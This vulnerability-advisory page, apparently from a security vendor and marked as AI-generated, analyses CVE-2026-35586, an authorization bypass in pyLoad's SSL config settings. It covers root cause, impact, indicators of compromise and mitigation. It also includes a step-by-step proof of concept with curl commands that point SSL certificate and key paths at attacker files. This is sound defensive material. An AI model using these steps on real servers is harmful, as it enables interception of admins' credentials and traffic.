CVE-2026-35586: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-35586 is an authorization bypass vulnerability in pyLoad (pyload-ng), a free and open-source Python-based download manager. The flaw exists in the set_config_value() function, where the ADMIN_ONLY_CORE_OPTIONS set references incorrect SSL option names (ssl_cert, ssl_key) instead of the actual configuration names (ssl_certfile, ssl_keyfile), causing the admin-only authorization check to always evaluate to False. This allows any authenticated user with SETTINGS permission to overwrite SSL certificate and key file paths. All versions up to and including 0.5.0b3.dev96 are affected; the fix is available in 0.5.0b3.dev97. It carries a CVSS v3.1 base score of 6.8 (Medium/High) (GitHub Advisory).

Technical details

The root cause is CWE-863 (Incorrect Authorization): the ADMIN_ONLY_CORE_OPTIONS set in src/pyload/core/api/__init__.py (lines 237–248) contains ("webui", "ssl_cert") and ("webui", "ssl_key"), while the actual configuration options defined in src/pyload/core/config/default.cfg are named ssl_certfile, ssl_keyfile, and ssl_certchain. The authorization check at line 267 compares the incoming (category, option) tuple against this set; because the names never match, the guard always passes, and config.set() writes the attacker-supplied file path. The value is processed via os.path.realpath() in parser.py but undergoes no further validation. On the next server restart with SSL enabled, webserver_thread.py loads the attacker-controlled certificate and key paths directly into the SSL adapter (GitHub Advisory).

Impact

A non-admin authenticated user with SETTINGS permission can redirect the pyLoad HTTPS server to use attacker-controlled SSL certificate and key files. Upon server restart, all HTTPS traffic — including admin credentials and session tokens — is encrypted under the attacker's certificate, enabling man-in-the-middle (MitM) interception and decryption of all communications. Intercepted admin credentials can then be used to escalate to full administrative access, enabling complete configuration tampering and further lateral movement within the environment (GitHub Advisory).

Exploitability

A proof-of-concept exploit is publicly available in the GitHub Security Advisory, consisting of a complete step-by-step attack guide using curl commands targeting the /login and /json/save_config endpoints. Exploitation requires a low-privileged authenticated account with SETTINGS permission and the ability to place files on the server filesystem (potentially via pyLoad's own download functionality). There is no evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.017% (0.000170), and the vulnerability is not listed in the CISA KEV catalog (GitHub Advisory).

Exploitation steps

  1. Prerequisite setup: Ensure access to a pyLoad instance with SSL enabled and a non-admin user account that has SETTINGS permission. Place attacker-controlled certificate and key files on the server filesystem (e.g., via pyLoad's download functionality to write /tmp/attacker.crt and /tmp/attacker.key).
  2. Authenticate: Obtain a session cookie by logging in as the non-admin SETTINGS user:
curl -c cookies.txt -X POST 'http://localhost:8000/login' \
  -d 'username=settingsuser&password=password123'
  1. Overwrite SSL certificate path: Send a POST request to /json/save_config to replace the SSL certificate file path:
curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
  -H 'Content-Type: application/json' \
  -d '{"category": "core", "config": {"webui|ssl_certfile": "/tmp/attacker.crt"}}'
  1. Overwrite SSL key path: Replace the SSL key file path:
curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
  -H 'Content-Type: application/json' \
  -d '{"category": "core", "config": {"webui|ssl_keyfile": "/tmp/attacker.key"}}'
  1. Overwrite SSL certificate chain (never protected by any admin check):
curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
  -H 'Content-Type: application/json' \
  -d '{"category": "core", "config": {"webui|ssl_certchain": "/tmp/attacker-chain.crt"}}'
  1. Wait for server restart: After an admin restarts the server, pyLoad loads the attacker's certificate and key, enabling MitM interception of all HTTPS traffic including admin credentials and session tokens (GitHub Advisory).

Indicators of compromise

  • Network: Unexpected TLS certificate presented by the pyLoad HTTPS server (certificate issuer/subject does not match the expected CA or self-signed cert); TLS handshake failures or certificate warnings reported by clients connecting to pyLoad.
  • Logs: pyLoad access logs showing POST requests to /json/save_config from a non-admin account with payloads referencing ssl_certfile, ssl_keyfile, or ssl_certchain; configuration change log entries for webui SSL options made by a non-admin user.
  • File System: Unexpected or newly created .crt, .key, or .pem files in world-writable directories (e.g., /tmp/) on the pyLoad server; modification timestamps on pyLoad's SSL configuration files (ssl.crt, ssl.key) inconsistent with legitimate admin activity.
  • Configuration: pyLoad configuration file (pyload.cfg or equivalent) showing ssl_certfile, ssl_keyfile, or ssl_certchain pointing to paths outside the expected certificate directory (GitHub Advisory).

Mitigation and workarounds

Upgrade pyLoad (pyload-ng) to version 0.5.0b3.dev97 or later, which corrects the option names in ADMIN_ONLY_CORE_OPTIONS to ssl_certfile and ssl_keyfile and adds the missing ssl_certchain entry. As an interim workaround, restrict the SETTINGS permission to trusted administrators only, eliminating the attack surface. Additionally, monitor SSL certificate configuration changes for unauthorized modifications and verify SSL certificate integrity in production deployments after any server restart (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management